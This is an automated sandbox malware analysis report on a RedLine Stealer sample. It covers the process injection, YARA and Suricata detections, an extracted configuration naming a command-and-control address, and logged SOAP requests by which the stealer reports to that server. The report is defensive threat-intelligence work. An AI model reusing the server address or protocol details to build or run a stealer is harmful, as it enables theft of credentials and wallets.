Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yGu4YUwMl6.exe

Overview

General Information

Sample name:yGu4YUwMl6.exe
renamed because original name is a hash value
Original sample name:1161b525009e7448837a658eecc04275.exe
Analysis ID:1621303
MD5:1161b525009e7448837a658eecc04275
SHA1:2cad4c2f589760f6ae6830acb122a9d5eb9c66de
SHA256:7b9c9e71110c3980f1803a7438f507eadea9b078e59a61d551e21e1cae8ad5e5
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yGu4YUwMl6.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\yGu4YUwMl6.exe" MD5: 1161B525009E7448837A658EECC04275)
    • RegSvcs.exe (PID: 7444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.44:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.yGu4YUwMl6.exe.40f8350.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.yGu4YUwMl6.exe.40f8350.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.yGu4YUwMl6.exe.40f8350.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.yGu4YUwMl6.exe.40f8350.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0xfbcb:$gen01: ChromeGetRoamingName
                  • 0xfbff:$gen02: ChromeGetLocalName
                  • 0xfc28:$gen03: get_UserDomainName
                  • 0x11e67:$gen04: get_encrypted_key
                  • 0x113e3:$gen05: browserPaths
                  • 0x1172b:$gen06: GetBrowsers
                  • 0x11061:$gen07: get_InstalledInputLanguages
                  • 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x7318:$spe6: windows-1251, CommandLine:
                  • 0x125bd:$spe9: *wallet*
                  • 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                  • 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                  • 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                  • 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:40.980727+010020450001Malware Command and Control Activity Detected185.222.58.4455615192.168.2.449734TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:44.425031+010020460561A Network Trojan was detected185.222.58.4455615192.168.2.449734TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:44.425031+010020450011Malware Command and Control Activity Detected185.222.58.4455615192.168.2.449734TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:35.949638+010028496621Malware Command and Control Activity Detected192.168.2.449734185.222.58.4455615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:41.172955+010028493511Malware Command and Control Activity Detected192.168.2.449734185.222.58.4455615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:44.479705+010028493521Malware Command and Control Activity Detected192.168.2.449738185.222.58.4455615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-02-21T19:26:35.949638+010018000001Malware Command and Control Activity Detected192.168.2.449734185.222.58.4455615TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: yGu4YUwMl6.exeAvira: detected
                    Found malware configuration
                    Source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.44:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for submitted file
                    Source: yGu4YUwMl6.exeVirustotal: Detection: 70%Perma Link
                    Source: yGu4YUwMl6.exeReversingLabs: Detection: 71%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: yGu4YUwMl6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49737 version: TLS 1.0
                    Source: yGu4YUwMl6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Mono.Cecil.Pdb source: yGu4YUwMl6.exe
                    Source: Binary string: Microsoft.Build.Utilities.v4.0<>9__1_10<Weave>b__1_10columnHeader10<>9__1_0<Weave>b__1_0<>c__DisplayClass1_0<>9__2_0<.ctor>b__2_0<>9__3_0<WeaveDependencyObjectBaseClass>b__3_0<>9__14_0<GetStaticCtor>b__14_0<>c__DisplayClass4_0<>c__DisplayClass15_0<>c__DisplayClass5_0<>c__DisplayClass6_0<>9__7_0<IsAutoPropertySetter>b__7_0<>c__DisplayClass7_0<>c__DisplayClass18_0<>9__8_0<IsAutoPropertyGetter>b__8_0<GetStaticDependencyPropertyField>b__0<WeaveGetter>b__0<WeaveSetter>b__0<WeaveProperties>b__0<LoadWindows>b__0<WeaveDependencyProperty>b__0Ldarg_0get_<>h__TransparentIdentifier0<Weave>b__11columnHeader11<>9__1_1<Weave>b__1_1<>9__3_1<WeaveDependencyObjectBaseClass>b__3_1<cctor>5__1Ldarg_1IEnumerable`1Collection`1EqualityComparer`1IEnumerator`1List`1Form1WindowsFormsApplication1menuStrip1columnHeader1get_<>h__TransparentIdentifier1get_st1listView1<Weave>b__12columnHeader12Int32<>9__3_2<WeaveDependencyObjectBaseClass>b__3_2<propertyName>5__2<>9__2<Weave>b__2<>f__AnonymousType0`2<>f__AnonymousType1`2<>f__AnonymousType2`2Func`2IGrouping`2KeyValuePair`2Dictionary`2columnHeader2<>h__TransparentIdentifier2columnHeader13<>9__1_3<Weave>b__1_3<type>5__3<Weave>b__3Func`3columnHeader3columnHeader14<>9__1_4<Weave>b__1_4<declaringType>5__4<FindAttachedPropertyFields>d__4columnHeader4<>9__1_5<Weave>b__1_5<e>5__5columnHeader5<>9__1_6<Weave>b__1_6<isReadOnly>5__6columnHeader6<>9__1_7<Weave>b__1_7columnHeader7<Weave>b__8columnHeader8<>9<>9__1_9<Weave>b__1_9columnHeader9<Module>get_AGetWindowLongAget_BDWM_TNP_RECTSOURCEDWM_TNP_VISIBLEWS_VISIBLEGWL_STYLEPSIZESizeFget_GDWM_TNP_RECTDESTINATIONSystem.IOPAPLOPWS_BORDERget_RDWM_THUMBNAIL_PROPERTIESTget_grxVTARGETWINDOWZPVXDWM_TNP_SOURCECLIENTAREAONLYDWM_TNP_OPACITYaMono.Cecil.PdbmscorlibhThumbthumb<>cSystem.Collections.GenericMono.Collections.Genericget_IsStaticlpEnumFuncsrcget_Idget_CurrentManagedThreadId<>l__initialThreadIdProcessThreadLoadAddadd_SelectedIndexChangedcomboBox_SelectedIndexChangedset_FormattingEnabledSynchronized<<>h__TransparentIdentifier0>i__Field<<>h__TransparentIdentifier1>i__Field<method>i__Field<module>i__Field<type>i__Field<p>i__Field<TypePatternMatch>k__BackingField<AttributePatternMatch>k__BackingField<Definition>k__BackingField<HasChanges>k__BackingField<Files>k__BackingField<Assembly>k__BackingFieldAttachedPropertyFieldGetStaticDependencyPropertyFieldfieldLdsfldStsfldhWndget_OperandhwndAddGetterMethodAddSetterMethodImportObjectEqualsMethodget_GetMethodget_SetMethodImportMethodget_methodTracedefaultInstanceFieldReferenceMethodReferenceTypeReferenceMemberReferencePropertyReferencereferencercSourcesourceGetHashCodeget_OpCodeset_AutoScaleModenodeImageget_MessageLogMessagemessageAddRangeEndInvokeBeginInvokeImportPropertyChangedEventHandlerInvokeIEnumerableIDisposablefVisibleDWMHandleget_HandleoldHandleRuntimeTypeHandleGetTypeFromHandleget_MainWindowHandleSingleOpenFileWinFormsSampleget_MainWindowTitleget_Moduleget_MainModuleProcessModuleget_moduleget_Nameset_Nameget_FileNameget_MachineNameget_FullNamepropNa

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49734 -> 185.222.58.44:55615
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49734 -> 185.222.58.44:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49738 -> 185.222.58.44:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.44:55615 -> 192.168.2.4:49734
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49734 -> 185.222.58.44:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.44:55615 -> 192.168.2.4:49734
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.58.44:55615 -> 192.168.2.4:49734
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.58.44:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: global trafficTCP traffic: 192.168.2.4:49734 -> 185.222.58.44:55615
                    Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.44:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.44:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.44:55615Content-Length: 933417Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.44:55615Content-Length: 933409Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: Joe Sandbox ViewIP Address: 104.26.12.31 104.26.12.31
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49737 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.44
                    Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.44:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.44:5
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.44:55615
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.44:55615/
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
